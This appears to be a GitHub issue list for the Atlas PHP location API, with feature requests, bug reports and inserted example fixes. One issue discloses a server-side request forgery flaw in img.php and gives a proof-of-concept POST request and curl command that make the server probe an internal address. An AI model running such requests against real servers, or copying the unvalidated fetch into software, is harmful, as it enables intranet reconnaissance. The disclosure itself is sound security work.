aaronpk / atlas
Atlas is a set of APIs for looking up information about locations
License: Apache License 2.0
To allow for an external attribution image to be passed through, as you currently allow a marker image URL to be passed through.
As we discussed:
Living close to the border, Atlas gives the wrong address for my home location. It seems to be a problem with the &distance=10000 parameter on the API call to geocode.arcgis.com.
This was originally used to get a location in areas where there was no address found, extending the search area by 10km.
The solution would be to first make a request without the parameter, and only if it returns empty, fetch with the 10km distance param.
You can check the API calls with coordinates for my home address in this private post, if you need testing.
Publish a zip file including the vendor folder containing dependencies so you can unzip it and run it without needing to use composer.
I'd like a feature where I submit a date and local time (without a timezone) and get, if possible, the timezone for this time and/or a fully tz-aware timestamp.
This is a bit ugly since it has edge cases: timestamps can be either invalid or ambiguous, e.g. when they fall in a DST switch. For me, erroring out would be acceptable behavior in both cases.
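Added example, not Atlas code and not the requester's: one way to turn a timezone-less local date/time into a tz-aware timestamp while refusing both DST edge cases instead of silently guessing. The zone name is passed in directly (the lat/lng-to-zone lookup the request implies is assumed to happen elsewhere); the function name and the use of RangeException are assumptions. For each UTC offset the zone uses around that date, the wall-clock reading is converted back to an instant and kept only if the zone really has that offset at that instant; zero surviving candidates is a gap, two is an overlap.

```php
<?php
// Added example (not project code): resolve a local date/time in an IANA zone,
// throwing on DST gaps and overlaps rather than picking one interpretation.

function resolve_local_time(string $local, string $zone): DateTimeImmutable
{
    $tz = new DateTimeZone($zone);

    // Read the wall-clock value as if it were UTC to get a zone-independent
    // number; the real instant is that number minus the zone's offset.
    $wall   = new DateTimeImmutable($local, new DateTimeZone('UTC'));
    $wallTs = $wall->getTimestamp();

    // Collect every offset in force within two days of the requested time;
    // getTransitions() starts with the state active at the range begin.
    $offsets = [];
    foreach ($tz->getTransitions($wallTs - 2 * 86400, $wallTs + 2 * 86400) as $t) {
        $offsets[$t['offset']] = true;
    }

    // A candidate offset is real only if the zone actually uses that offset
    // at the instant the candidate produces.
    $matches = [];
    foreach (array_keys($offsets) as $offset) {
        $utcTs = $wallTs - $offset;
        if ($tz->getOffset(new DateTimeImmutable("@$utcTs")) === $offset) {
            $matches[$offset] = $utcTs;
        }
    }

    if (count($matches) === 0) {
        throw new RangeException("$local does not exist in $zone (DST gap)");
    }
    if (count($matches) > 1) {
        throw new RangeException("$local is ambiguous in $zone (DST overlap)");
    }
    return (new DateTimeImmutable('@' . reset($matches)))->setTimezone($tz);
}

// Illustrative calls (Europe/Berlin switches at 01:00 UTC on both dates):
echo resolve_local_time('2024-06-15 12:00', 'Europe/Berlin')->format(DATE_ATOM), "\n";
foreach (['2024-03-31 02:30', '2024-10-27 02:30'] as $edge) {
    try {
        resolve_local_time($edge, 'Europe/Berlin');
    } catch (RangeException $e) {
        echo $e->getMessage(), "\n";
    }
}
```

The two-day window is wide enough because no zone changes offset twice within 48 hours of a given wall-clock time; a zone with a single offset in the window yields exactly one candidate and resolves normally.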
Right now the map is always drawn with -180 on the left. When a line spans, for example, Tokyo to LA, the line is drawn the wrong way instead of crossing the -180 line.
Adding a couple of lines similar to curl_setopt($chs[$x][$y], CURLOPT_FOLLOWLOCATION, true); in just the right places seems to do the trick.
Found out after I got a server error. There's actually a comment in the code that reads // In case any of the tiles fail, they will be grey instead of throwing an error : this is not quite true; in this case, the response is non-empty (it is a 301 error/redirect page), causing imagecreatefromstring() to run but return false. This in turn leads to a fatal error when imagesx($tile) gets called: imagesx(): Argument #1 ($image) must be of type GdImage, bool given.
Not sure if this library is still maintained, just thought I'd leave this here anyhow.
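Added example, not code from the Static Maps API project or from the reporter: a tile fetch that follows redirects and checks the HTTP status, the content type and the return value of imagecreatefromstring() before the tile reaches imagesx(), so a redirect page or a non-image body produces the grey tile the code comment promises instead of a fatal error. The function name, the 256-pixel tile size, the timeouts and the grey value are assumptions.

```php
<?php
// Added example (not project code): fetch one map tile and never hand a bool
// to the GD functions. Requires PHP 8 for GdImage and str_starts_with().

function fetch_tile_or_grey(string $tileUrl, int $tileSize = 256): GdImage
{
    $ch = curl_init($tileUrl);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,   // a 301/302 body is HTML, not a tile
        CURLOPT_MAXREDIRS      => 3,
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_FAILONERROR    => true,   // 4xx/5xx makes curl_exec() return false
    ]);
    $body   = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    $ctype  = (string) curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
    curl_close($ch);

    $img = false;
    if ($body !== false && $status === 200 && str_starts_with($ctype, 'image/')) {
        // imagecreatefromstring() returns false (with an E_WARNING) for bytes it
        // cannot decode; the @ silences the warning, the === check below is what
        // keeps imagesx() from ever seeing a bool.
        $img = @imagecreatefromstring($body);
    }
    if ($img === false) {
        // Fallback: a solid grey tile of the expected size.
        $img  = imagecreatetruecolor($tileSize, $tileSize);
        $grey = imagecolorallocate($img, 0xCC, 0xCC, 0xCC);
        imagefilledrectangle($img, 0, 0, $tileSize - 1, $tileSize - 1, $grey);
    }
    return $img;
}

// Illustrative use: both a redirecting and a 404 tile URL end up grey.
$tile = fetch_tile_or_grey('https://tile.example.invalid/1/0/0.png');
printf("tile is %dx%d\n", imagesx($tile), imagesy($tile));
```

Following redirects fixes the reporter's case, but the decode check is what makes the comment true in general: a tile server can also answer 200 with an HTML error page, and only the imagecreatefromstring() result tells you whether you actually got an image.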
with URL parameters like lat/lng to be able to quickly create a URL that loads a map pin at a certain location
given a lat/lng, return information about the current weather at that location:
Use weather icons from https://erikflowers.github.io/weather-icons/
Weather data from wunderground
Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.
Impact version: latest
Tested with PHP 7.2
The vulnerable code is located in the curl_init function of the img.php file, which does not sufficiently validate the marker parameter. Taint introduced from the $markersTemp variable in the img.php file eventually reaches the tainted function curl_init; when curl_exec runs, a request is sent to the URL specified by the marker parameter, leading to an SSRF vulnerability.
......
if($markersTemp=request('marker')) {
if(!is_array($markersTemp))
$markersTemp = array($markersTemp);
......
if(preg_match('/https?:\/\/(.+)/', $properties['icon'], $match)) {
// Looks like an external image, attempt to download it
$ch = curl_init($properties['icon']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$img = curl_exec($ch);
......
Because the marker parameter is unrestricted, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows:
POST /img.php HTTP/1.1
Host: 172.16.119.1:81
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Connection: close
marker=icon:http://172.16.119.1/testpoc;lat:lat123;lng:lng123
You can also use the following curl command to verify the vulnerability
curl -i -s -k -X $'POST' \
-H $'Host: 172.16.119.1:81' -H $'Content-Length: 61' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Connection: close' \
--data-binary $'marker=icon:http://172.16.119.1/testpoc;lat:lat123;lng:lng123' \
$'http://172.16.119.1:81/img.php'
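Added example, not code from the project and not part of the report above: one way to fence the external-icon fetch so the marker parameter can no longer point the server at loopback, RFC 1918 or link-local addresses. The hostname is resolved once, every answer is checked with PHP's filter_var() range flags, and the vetted IP is pinned into curl with CURLOPT_RESOLVE so a DNS rebind between check and fetch cannot swap it; redirects are disabled because a 30x to an internal address would otherwise bypass the check. Function names, the 80/443 port allow-list and the size limit are assumptions. gethostbynamel() only returns IPv4 answers, so IPv6-only hosts are rejected here, a deliberate fail-closed choice.

```php
<?php
// Added example (not project code): validate a user-supplied icon URL before
// the server fetches it, closing the SSRF path described in the report.

function resolve_public_ip(string $host): ?string
{
    // Literal IPs are checked as-is; hostnames are resolved exactly once.
    $ips = filter_var($host, FILTER_VALIDATE_IP) ? [$host] : (gethostbynamel($host) ?: []);
    foreach ($ips as $ip) {
        // NO_PRIV_RANGE rejects 10/8, 172.16/12, 192.168/16 (and fc00::/7);
        // NO_RES_RANGE rejects 0/8, 127/8, 169.254/16, 240/4, ::1 and friends.
        if (filter_var($ip, FILTER_VALIDATE_IP,
                FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
            return null; // one internal answer fails the whole lookup
        }
    }
    return $ips[0] ?? null;
}

function fetch_icon_safely(string $url, int $maxBytes = 1048576): ?string
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) return null;
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) return null;
    if (isset($p['user']) || isset($p['pass'])) return null;   // no http://x@internal tricks
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) return null;         // no port scanning

    $ip = resolve_public_ip($p['host']);
    if ($ip === null) return null;

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,  // a redirect could point at 169.254.169.254
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_RESOLVE        => ["{$p['host']}:{$port}:{$ip}"], // pin the vetted IP
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_MAXFILESIZE    => $maxBytes,
    ]);
    $body   = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    $ctype  = (string) curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
    curl_close($ch);

    if ($body === false || $status !== 200 || !str_starts_with($ctype, 'image/')) return null;
    return $body;
}

// Illustrative calls: the PoC target from the report is refused before any
// connection is made; a public https icon URL is fetched and size-capped.
var_dump(fetch_icon_safely('http://172.16.119.1/testpoc') === null);   // bool(true)
var_dump(fetch_icon_safely('http://127.0.0.1:81/img.php') === null);   // bool(true)
```

CURLOPT_MAXFILESIZE only applies when the server sends a Content-Length; a streaming response needs a CURLOPT_PROGRESSFUNCTION or a WRITEFUNCTION byte counter to enforce the cap. If the application does need redirects, follow them manually and run the same validation on each Location header rather than re-enabling CURLOPT_FOLLOWLOCATION.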
Possibly an issue with Savant3 dependency not being compatible with PHP 8. Running the application produces this error:
Fatal error: Uncaught ValueError: func_get_arg(): Argument #1 ($position) must be less than the number of the arguments passed to the currently executed function in /app/vendor/saltybeagle/savant3/Savant3.php:901
Stack trace:
#0 /app/vendor/saltybeagle/savant3/Savant3.php(901): func_get_arg(1)
#1 /app/vendor/p3k/slim-savant/Savant.php(74): Savant3->assign(Array)
#2 /app/vendor/slim/slim/Slim/View.php(255): Slim\Extras\Views\Savant->render('layout.php', Array)
#3 /app/vendor/slim/slim/Slim/View.php(243): Slim\View->fetch('layout.php', NULL)
#4 /app/vendor/slim/slim/Slim/Slim.php(755): Slim\View->display('layout.php')
#5 /app/vendor/p3k/slim-savant/SlimSavant.php(19): Slim\Slim->render('layout.php', Array)
#6 /app/controllers/main.php(5): Slim\Savant\render('index')
#7 [internal function]: {closure}()
#8 /app/vendor/slim/slim/Slim/Route.php(468): call_user_func_array(Object(Closure), Array)
#9 /app/vendor/slim/slim/Slim/Slim.php(1355): Slim\Route->dispatch()
#10 /app/vendor/slim/slim/Slim/Middleware/Flash.php(85): Slim\Slim->call()
#11 /app/vendor/slim/slim/Slim/Middleware/MethodOverride.php(92): Slim\Middleware\Flash->call()
#12 /app/vendor/slim/slim/Slim/Middleware/PrettyExceptions.php(67): Slim\Middleware\MethodOverride->call()
#13 /app/vendor/slim/slim/Slim/Slim.php(1300): Slim\Middleware\PrettyExceptions->call()
#14 /app/public/index.php(12): Slim\Slim->run()
#15 {main} thrown in /app/vendor/saltybeagle/savant3/Savant3.php on line 901
There may be other such incompatibility issues lurking in dependencies or in the app's own code.
PHP 7.x is no longer maintained and has reached end of life. One way this manifests itself is that versions below v8 are disabled in Brew, and not supported by tools like Nixpicks.